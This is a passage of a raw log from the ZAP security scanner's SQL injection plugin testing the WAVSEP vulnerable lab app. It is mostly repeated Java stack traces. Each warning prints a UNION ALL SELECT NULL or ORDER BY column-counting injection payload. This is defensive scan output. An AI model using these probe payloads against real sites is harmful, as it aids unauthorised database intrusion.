org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679948 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679948 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679967 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679968 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679969 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679970 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679971 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679971 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679972 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679973 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679974 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 4555-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 4555-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679975 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 